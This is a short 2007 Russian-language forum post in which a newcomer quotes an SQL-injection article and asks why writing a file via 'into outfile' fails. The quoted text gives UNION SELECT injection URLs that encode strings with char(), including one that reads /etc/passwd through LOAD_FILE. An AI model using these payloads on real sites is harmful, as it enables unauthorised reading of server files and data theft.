03.09.2007, 17:39
|
|
Новичок
Регистрация: 02.09.2007
Сообщений: 14
Провел на форуме:
14234
Репутация:
4
|
|
Почему не залить то? в различных статьях по sql инъекциям сказано так:
Частично, решить эту проблему поможет нам функция char, которая возвращает строке по кодам символов. Например
PHP код:
http://site/test.php?id=9999+union+select+char(116,101,115,116),null,null/*
http://site/test.php?id=9999+union+select+char(116,101,115,116),null,null+from_table1/*
http://site/test.php?id=9999+union+select+null,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),null/*
Единственное ограничение. В случае, если хочется сделать into outfile, то а качестве имени файла, необходимо передать имя файла в кавычках. into outfile char(...) выдает ошибку.
Токо я не понял смысл выше сказанного!!! |
|
|